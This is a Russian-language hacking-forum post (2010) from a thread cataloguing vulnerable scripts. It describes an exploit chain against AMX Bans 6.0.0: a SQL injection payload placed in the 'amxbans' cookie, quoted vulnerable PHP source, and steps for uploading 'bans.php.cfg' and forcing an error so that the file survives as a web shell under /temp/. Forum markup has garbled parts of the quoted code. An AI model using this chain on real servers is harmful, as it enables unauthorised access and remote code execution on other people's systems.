Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #7  
Старый 17.08.2010, 21:19
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
[SIZE="3"][COLOR="Green"]AMX BANS 6.0.0

в куки

Код:
Code:
amxbans:' union select 1,0x27,1,4 -- :1233
->accsess.php.inc

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT id,username,level,email FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_webadmins` WHERE logcode='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' LIMIT 1"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

 if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {

 while([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uid"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"email"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"level"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"sid"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]session_id[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"loggedin"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];

}

[/COLOR][/COLOR
->modul_iexport.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$reason[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$plnick[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"])!=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_NOREQUIREDFIELDS"[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]=(int)[/COLOR][COLOR="#0000BB"]strtotime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]$types[/COLOR][COLOR="#007700"]=array([/COLOR][COLOR="#DD0000"]"cfg"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"txt"[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILENOFILE"[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]$file_type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strrchr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

if(![/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$types[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILETYPENOTALLOWED"[/COLOR][COLOR="#007700"];

}

if([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'size'[/COLOR][COLOR="#007700"]] >= ([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]max_file_size[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILETOBIG"[/COLOR][COLOR="#007700"];

if(![/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]) {

if(![/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"temp/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILEUPLOADFAIL"[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"temp/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"imported"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

while (![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"]))

{

[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]128[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]=(int)[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#FF8000"]//amxbans 5.x hack, exported banned.cfg with reason

[/COLOR][COLOR="#0000BB"]$reason_real[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

if([/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {

for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}

[/COLOR][COLOR="#FF8000"]//write ban to db

[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"imported"[/COLOR][COLOR="#007700"]]++;

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans`

(`player_id`,`player_nick`,`admin_nick`,`ban_type`,`ban_reason`,`ban_created`,`ban_length`,`server_name`,`imported`) VALUES

('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$plnick[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','S','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$reason_real[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]","[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',1)"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

}else if([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]])==[/COLOR][COLOR="#DD0000"]"banip"[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#FF8000"]//ban with ip

[/COLOR][COLOR="#007700"]if(![/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}

[/COLOR][COLOR="#FF8000"]//search for a already existing permanent ban

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `player_ip` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}

[/COLOR][COLOR="#FF8000"]//write ban to db

[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"imported"[/COLOR][COLOR="#007700"]]++;

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans`(`player_ip`,`player_nick`,`admin_nick`,`ban_type`,`ban_reason`,`ban_created`,`ban_length`,`server_name`,`imported`)

VALUES

('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$plnick[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','SI','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$reason_real[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]","[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',1)"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

} else {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}

}

[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]//del temp file

[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"temp/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
Импортируем список банов "bans.php.cfg" с таким содержанием:

Код:
Code:
banid 0 STEAM_0:1:1234567891011121314151617
Чтобы после импорта наш шелл не удалился, нам пришлось добавить в куки " ' "(ковычку).

В итоге в modul_iexport.php при загрузки файла, скрипт завершает работу с ошибкой.

Шелл будет доступен по адресу:

http://[path]/temp/bans.php.cfg
 
Ответить с цитированием